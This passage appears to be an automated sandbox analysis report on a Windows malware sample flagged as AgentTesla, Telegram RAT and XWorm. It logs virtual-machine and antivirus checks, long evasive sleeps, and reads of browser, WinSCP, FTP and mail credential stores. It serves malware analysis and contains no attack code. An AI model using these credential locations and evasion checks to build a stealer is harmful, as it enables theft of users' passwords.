Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Memory allocated: E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Memory allocated: 2860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Memory allocated: 26B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Memory allocated: 16F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Memory allocated: 1B340000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Window / User API: threadDelayed 1158	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Window / User API: threadDelayed 6566	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Window / User API: threadDelayed 2346	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Window / User API: threadDelayed 7505	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 6804	Thread sleep count: 1158 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 6804	Thread sleep count: 6566 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -99521s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -99405s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -99187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -99077s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -98915s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -98809s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -98656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -98524s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -98422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -98289s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -98172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -97843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -97734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -97625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -97406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -97297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -97187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -97078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -96969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -96750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -96641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -96531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -96422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -96312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -96203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -96094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -95984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -95875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -95766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -95656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -95547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe TID: 3608	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 99521	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 99405	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 99187	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 99077	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 98915	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 98809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 98656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 98524	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 98422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 98289	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 98172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 97843	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 97734	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 97625	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 97406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 97297	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 97187	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 97078	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 96969	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 96750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 96641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 96531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 96422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 96312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 96203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 96094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 95984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 95875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 95766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 95656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 95547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: FB_7BD8.tmp.exe, 00000002.00000002.4523857595.00000000009F8000.00000004.00000020.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C162000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Process created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe"			Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Process created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe"			Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: DJ5PhUwOsM.exe, type: SAMPLE

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C1FF000.00000004.00000020.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C162000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FB_7BD8.tmp.exe PID: 6404, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match	File source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE
